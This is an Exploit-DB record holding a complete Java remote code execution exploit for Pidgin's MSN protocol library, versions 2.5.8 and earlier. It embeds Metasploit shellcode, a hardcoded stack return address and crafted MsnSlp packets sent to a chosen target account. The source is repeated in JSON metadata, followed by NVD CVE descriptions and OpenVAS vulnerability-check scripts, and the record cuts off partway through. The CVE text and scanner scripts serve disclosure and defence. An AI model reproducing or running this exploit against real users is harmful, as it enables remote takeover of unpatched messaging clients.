ID EDB-ID:9615
Type exploitdb
Reporter Pierre Nogues
Modified 2009-09-09T00:00:00
Description
Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform
/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
* Pidgin is a multi-protocol Instant Messenger.
*
* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
* The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
* which could lead to memory corruption.
*
* Affected versions :
* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
* Windows, Linux, Mac
*
* Fix :
* Fixed in Pidgin 2.5.9
* Update to the latest version : http://www.pidgin.im/download/
*
* References :
* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
* [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
* javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
* java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/
import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;
public class PidginExploit {
private MsnMessenger messenger;
private String login;
private String password;
private String target;
private int session_id = NumberUtils.getIntRandom();
private byte shellcode[] = new byte[] {
/*
* if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
* sub esp,500
*/
(byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,
/*
* windows/exec - 121 bytes
* http://www.metasploit.com
* EXITFUNC=process, CMD=calc.exe
*/
(byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
(byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
(byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
(byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
(byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
(byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
(byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
(byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
(byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
(byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
(byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
(byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
(byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
(byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
(byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
(byte) 0x00
};
// reteip = pointer to the return address in the stack
// The shellcode will be wrote just before reteip
// and reteip will automaticly point to the shellcode. It's magic !
private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8
private int neweip;
private byte[] payload = new byte[shellcode.length + 4];
private int totallength = reteip + 4;
public static void main(String[] args) throws Exception {
if(args.length != 3){
System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
}else{
PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
exploit.start();
}
}
public PidginExploit(String login, String password, String target){
this.login = login;
this.password = password;
this.target = target;
neweip = reteip - shellcode.length ;
for(int i=0;i<shellcode.length;i++)
payload[i] = shellcode[i];
payload[shellcode.length] = (byte)(neweip & 0x000000FF);
payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);
payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
}
public void start() {
messenger = MsnMessengerFactory.createMsnMessenger(login,password);
messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);
messenger.setLogIncoming(false);
messenger.setLogOutgoing(false);
initMessenger(messenger);
messenger.login();
}
protected void initMessenger(MsnMessenger messenger) {
messenger.addContactListListener(new MsnContactListAdapter() {
public void contactListInitCompleted(MsnMessenger messenger) {
final Object id = new Object();
messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {
public void switchboardStarted(MsnSwitchboard switchboard) {
if (id != switchboard.getAttachment())
return;
switchboard.inviteContact(Email.parseStr(target));
}
public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
if (id != switchboard.getAttachment())
return;
MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
msg.setIdentifier(NumberUtils.getIntRandom());
msg.setSessionId(session_id);
msg.setOffset(0);
msg.setTotalLength(totallength);
msg.setCurrentLength(totallength);
// This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
// We'll use this buffer to rewrite memory in the stack
msg.setFlag(0x1000020);
msg.setP2PDest(target);
switchboard.sendMessage(msg);
System.out.println("First packet sent, waiting for the ACK");
}
public void switchboardClosed(MsnSwitchboard switchboard) {
System.out.println("switchboardClosed");
switchboard.getMessenger().removeSwitchboardListener(this);
}
public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
System.out.println("contactLeaveSwitchboard");
}
});
messenger.newSwitchboard(id);
}
});
messenger.addMessageListener(new MsnMessageAdapter(){
public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {
//We receive the ACK of our first packet with the ID of the new bogus packet
message.getIdentifier();
MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
payload.length, payload, target);
switchboard.sendMessage(msg);
System.out.println("ACK received && Payload sent !");
System.out.println("Exploit OK ! CTRL+C to quit");
}
});
messenger.addMessengerListener(new MsnMessengerAdapter() {
public void loginCompleted(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " login");
}
public void logout(MsnMessenger messenger) {
System.out.println(messenger.getOwner().getEmail() + " logout");
}
public void exceptionCaught(MsnMessenger messenger,
Throwable throwable) {
System.out.println("caught exception: " + throwable);
}
});
}
}
// milw0rm.com [2009-09-09]
{"published": "2009-09-09T00:00:00", "id": "EDB-ID:9615", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "hash": "a3cd763b4f635d42ae04b9db43518ab098599e5d95e579edce9de746183f3049", "description": "Pidgin MSN <= 2.5.8 Remote Code Execution Exploit. CVE-2009-1376,CVE-2009-2694. Remote exploit for windows platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/9615/", "lastseen": "2016-02-01T10:59:54", "edition": 1, "title": "Pidgin MSN <= 2.5.8 - Remote Code Execution Exploit", "osvdbidlist": ["54647"], "modified": "2009-09-09T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "sourceHref": "https://www.exploit-db.com/download/9615/", "references": [], "reporter": "Pierre Nogues", "sourceData": "/*\n* Pidgin MSN <= 2.5.8 Remote Code Execution\n*\n* Pierre Nogues - pierz@hotmail.it\n* http://www.indahax.com/\n*\n*\n* Description:\n* Pidgin is a multi-protocol Instant Messenger.\n*\n* This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].\n* The library \"libmsn\" used by pidgin doesn't handle specially crafted MsnSlp packets\n* which could lead to memory corruption.\n*\n* Affected versions :\n* Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.\n*\n* Plateforms :\n* Windows, Linux, Mac\n*\n* Fix :\n* Fixed in Pidgin 2.5.9\n* Update to the latest version : http://www.pidgin.im/download/\n*\n* References :\n* [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694\n* [2] http://www.coresecurity.com/content/libpurple-arbitrary-write\n* [3] http://www.pidgin.im/news/security/?id=34\n*\n* Usage :\n* You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/\n* javac.exe -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PidginExploit.java\n* java -cp \"%classpath%;.\\jml-1.0b3-full.jar\" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\n*\n*/\n\nimport net.sf.jml.*;\nimport net.sf.jml.event.*;\nimport net.sf.jml.impl.*;\nimport net.sf.jml.message.p2p.*;\nimport net.sf.jml.util.*;\n\npublic class PidginExploit {\n\n private MsnMessenger messenger;\n private String login;\n private String password;\n private String target;\n\n private int session_id = NumberUtils.getIntRandom();\n\n private byte shellcode[] = new byte[] {\n\n /*\n * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !\n * sub esp,500\n */\n (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,\n\n\n /*\n * windows/exec - 121 bytes\n * http://www.metasploit.com\n * EXITFUNC=process, CMD=calc.exe\n */\n (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,\n (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,\n (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,\n (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,\n (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,\n (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,\n (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,\n (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,\n (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,\n (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,\n (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,\n (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,\n (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,\n (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,\n (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,\n (byte) 0x00\n };\n\n // reteip = pointer to the return address in the stack\n // The shellcode will be wrote just before reteip\n // and reteip will automaticly point to the shellcode. It's magic !\n private int reteip = 0x0022CFCC; //stack on XP SP3-FR Pidgin 2.5.8\n\n private int neweip;\n private byte[] payload = new byte[shellcode.length + 4];\n private int totallength = reteip + 4;\n\n public static void main(String[] args) throws Exception {\n\n if(args.length != 3){\n System.out.println(\"PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL\");\n }else{\n PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);\n exploit.start();\n }\n\n }\n\n public PidginExploit(String login, String password, String target){\n this.login = login;\n this.password = password;\n this.target = target;\n\n neweip = reteip - shellcode.length ;\n\n for(int i=0;i<shellcode.length;i++)\n payload[i] = shellcode[i];\n\n payload[shellcode.length] = (byte)(neweip & 0x000000FF);\n payload[shellcode.length + 1] = (byte)((neweip & 0x0000FF00) >> 8);\n payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);\n payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);\n }\n\n public void start() {\n messenger = MsnMessengerFactory.createMsnMessenger(login,password);\n messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);\n\n messenger.setLogIncoming(false);\n messenger.setLogOutgoing(false);\n\n initMessenger(messenger);\n messenger.login();\n }\n\n protected void initMessenger(MsnMessenger messenger) {\n\n messenger.addContactListListener(new MsnContactListAdapter() {\n\n public void contactListInitCompleted(MsnMessenger messenger) {\n\n final Object id = new Object();\n\n messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {\n\n public void switchboardStarted(MsnSwitchboard switchboard) {\n\n if (id != switchboard.getAttachment())\n return;\n\n switchboard.inviteContact(Email.parseStr(target));\n }\n\n public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {\n if (id != switchboard.getAttachment())\n return;\n\n MsnP2PSlpMessage msg = new MsnP2PSlpMessage();\n msg.setIdentifier(NumberUtils.getIntRandom());\n msg.setSessionId(session_id);\n msg.setOffset(0);\n msg.setTotalLength(totallength);\n msg.setCurrentLength(totallength);\n\n // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null\n // We'll use this buffer to rewrite memory in the stack\n msg.setFlag(0x1000020);\n\n msg.setP2PDest(target);\n\n switchboard.sendMessage(msg);\n\n System.out.println(\"First packet sent, waiting for the ACK\");\n\n }\n\n public void switchboardClosed(MsnSwitchboard switchboard) {\n System.out.println(\"switchboardClosed\");\n switchboard.getMessenger().removeSwitchboardListener(this);\n }\n\n public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){\n System.out.println(\"contactLeaveSwitchboard\");\n }\n });\n messenger.newSwitchboard(id);\n }\n });\n\n messenger.addMessageListener(new MsnMessageAdapter(){\n\n public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {\n\n //We receive the ACK of our first packet with the ID of the new bogus packet\n message.getIdentifier();\n\n MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,\n payload.length, payload, target);\n\n switchboard.sendMessage(msg);\n System.out.println(\"ACK received && Payload sent !\");\n System.out.println(\"Exploit OK ! CTRL+C to quit\");\n\n }\n });\n\n\n\n messenger.addMessengerListener(new MsnMessengerAdapter() {\n\n public void loginCompleted(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" login\");\n }\n\n public void logout(MsnMessenger messenger) {\n System.out.println(messenger.getOwner().getEmail() + \" logout\");\n }\n\n public void exceptionCaught(MsnMessenger messenger,\n Throwable throwable) {\n System.out.println(\"caught exception: \" + throwable);\n }\n });\n\n }\n}\n\n// milw0rm.com [2009-09-09]\n", "objectVersion": "1.0"}
{"cve": [{"lastseen": "2017-09-19T13:36:35", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=514957", "http://www.coresecurity.com/content/libpurple-arbitrary-write", "http://www.vupen.com/english/advisories/2009/2303", "http://www.exploit-db.com/exploits/9615", "http://www.vupen.com/english/advisories/2009/2663", "http://developer.pidgin.im/wiki/ChangeLog", "http://developer.pidgin.im/viewmtn/revision/info/6f7343166c673bf0496ecb1afec9b633c1d54a0e", "http://www.pidgin.im/news/security/?id=34", "https://rhn.redhat.com/errata/RHSA-2009-1218.html", "http://www.debian.org/security/2009/dsa-1870", "http://sunsolve.sun.com/search/document.do?assetkey=1-66-266908-1"], "description": "The msn_slplink_process_msg function in libpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin (formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) by sending multiple crafted SLP (aka MSNSLP) messages to trigger an overwrite of an arbitrary memory location. NOTE: this issue reportedly exists because of an incomplete fix for CVE-2009-1376.", "edition": 2, "reporter": "NVD", "published": "2009-08-21T07:02:41", "title": "CVE-2009-2694", "type": "cve", "enchantments": {"score": {"modified": "2017-09-19T13:36:35", "vector": "NONE", "value": 6.8}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10319", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10319"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-2694"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:6320", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:6320"}], "modified": "2017-09-18T21:29:17", "cpe": ["cpe:/a:adium:adium:1.3.1", "cpe:/a:pidgin:pidgin:2.1.1", "cpe:/a:pidgin:pidgin:2.0.0", "cpe:/a:pidgin:pidgin:2.2.0", "cpe:/a:pidgin:pidgin:2.5.2", "cpe:/a:pidgin:pidgin:2.4.1", "cpe:/a:pidgin:pidgin:2.5.7", "cpe:/a:pidgin:pidgin:2.5.1", "cpe:/a:pidgin:pidgin:2.5.4", "cpe:/a:pidgin:pidgin:2.0.2", "cpe:/a:pidgin:pidgin:2.2.2", "cpe:/a:pidgin:pidgin:2.3.1", "cpe:/a:adium:adium:1.3.4", "cpe:/a:adium:adium:1.3.3", "cpe:/a:pidgin:pidgin:2.3.0", "cpe:/a:pidgin:pidgin:2.5.8", "cpe:/a:pidgin:pidgin:2.4.2", "cpe:/a:adium:adium:1.2.7", "cpe:/a:adium:adium:1.3.5", "cpe:/a:pidgin:pidgin:2.4.0", "cpe:/a:pidgin:pidgin:2.4.3", "cpe:/a:adium:adium:1.3", "cpe:/a:pidgin:pidgin:2.5.3", "cpe:/a:pidgin:pidgin:2.5.6", "cpe:/a:adium:adium:1.3.2", "cpe:/a:pidgin:pidgin:2.5.0", "cpe:/a:pidgin:pidgin:2.2.1", "cpe:/a:pidgin:pidgin:2.0.1", "cpe:/a:pidgin:pidgin:2.1.0"], "id": "CVE-2009-2694", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-2694", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-29T14:26:35", "references": ["http://www.gentoo.org/security/en/glsa/glsa-200905-07.xml", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:173", "https://bugzilla.redhat.com/show_bug.cgi?id=500493", "https://exchange.xforce.ibmcloud.com/vulnerabilities/50680", "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg00051.html", "http://www.ubuntu.com/usn/USN-781-2", "http://www.redhat.com/support/errata/RHSA-2009-1059.html", "http://www.mandriva.com/security/advisories?name=MDVSA-2009:140", "http://www.ubuntu.com/usn/USN-781-1", "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg00075.html", "https://www.redhat.com/archives/fedora-package-announce/2009-June/msg00033.html", "http://www.vupen.com/english/advisories/2009/1396", "http://www.securityfocus.com/bid/35067", "http://www.pidgin.im/news/security/?id=32", "http://www.redhat.com/support/errata/RHSA-2009-1060.html", "http://debian.org/security/2009/dsa-1805"], "description": "Multiple integer overflows in the msn_slplink_process_msg functions in the MSN protocol handler in (1) libpurple/protocols/msn/slplink.c and (2) libpurple/protocols/msnp9/slplink.c in Pidgin (formerly Gaim) before 2.5.6 on 32-bit platforms allow remote attackers to execute arbitrary code via a malformed SLP message with a crafted offset value, leading to buffer overflows. NOTE: this issue exists because of an incomplete fix for CVE-2008-2927.", "edition": 3, "reporter": "NVD", "published": "2009-05-26T11:30:05", "title": "CVE-2009-1376", "type": "cve", "enchantments": {"score": {"modified": "2017-09-29T14:26:35", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10476", "href": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10476"}, "bulletinFamily": "NVD", "cvelist": ["CVE-2009-1376"], "scanner": [{"system": "http://oval.mitre.org/XMLSchema/oval-definitions-5", "name": "oval:org.mitre.oval:def:10476", "href": "http://oval.mitre.org/repository/data/DownloadDefinition?id=oval:org.mitre.oval:def:10476"}], "modified": "2017-09-28T21:34:20", "cpe": ["cpe:/a:pidgin:pidgin:2.5.3:32_bit", "cpe:/a:pidgin:pidgin:2.4.3:32_bit", "cpe:/a:pidgin:pidgin:2.5.2:32_bit", "cpe:/a:pidgin:pidgin:2.5.0:32_bit", "cpe:/a:pidgin:pidgin:2.4.1:32_bit", "cpe:/a:pidgin:pidgin:2.5.5", "cpe:/a:pidgin:pidgin:2.5.4:32_bit", "cpe:/a:pidgin:pidgin:2.4.0:32_bit", "cpe:/a:pidgin:pidgin:2.4.2:32_bit"], "id": "CVE-2009-1376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1376", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-02T21:13:46", "references": [], "pluginID": "64784", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "FreeBSD Ports: pidgin, libpurple, finch", "type": "openvas", "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "modified": "2016-12-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64784", "id": "OPENVAS:64784", "sourceData": "#\n#VID 59e7af2d-8db7-11de-883b-001e3300a30d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 59e7af2d-8db7-11de-883b-001e3300a30d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n finch\n\nCVE-2009-2694\nThe msn_slplink_process_msg function in\nlibpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\n(formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\nremote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) by sending multiple\ncrafted SLP (aka MSNSLP) messages to trigger an overwrite of an\narbitrary memory location. NOTE: this issue reportedly exists because\nof an incomplete fix for CVE-2009-1376.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://secunia.com/advisories/36384/\nhttp://www.pidgin.im/news/security/?id=34\nhttp://www.vuxml.org/freebsd/59e7af2d-8db7-11de-883b-001e3300a30d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(64784);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-2694\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"FreeBSD Ports: pidgin, libpurple, finch\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"pidgin\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package pidgin version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"libpurple\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package libpurple version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"finch\");\nif(!isnull(bver) && revcomp(a:bver, b:\"2.5.9\")<0) {\n txt += 'Package finch version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:12", "references": [], "pluginID": "136141256231064784", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-09-02T00:00:00", "type": "openvas", "title": "FreeBSD Ports: pidgin, libpurple, finch", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1376", "CVE-2009-2694"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064784", "id": "OPENVAS:136141256231064784", "sourceData": "#\n#VID 59e7af2d-8db7-11de-883b-001e3300a30d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID 59e7af2d-8db7-11de-883b-001e3300a30d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n pidgin\n libpurple\n finch\n\nCVE-2009-2694\nThe msn_slplink_process_msg function in\nlibpurple/protocols/msn/slplink.c in libpurple, as used in Pidgin\n(formerly Gaim) before 2.5.9 and Adium 1.3.5 and earlier, allows\nremote attackers to execute arbitrary code or cause a denial of\nservice (memory corruption and application crash) by sending multiple\ncrafted SLP (aka MSNSLP) messages to trigger an overwrite of an\narbitrary memory location. NOTE: this issue reportedly exists because\nof an incomplete fix for CVE-2009-1376.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware 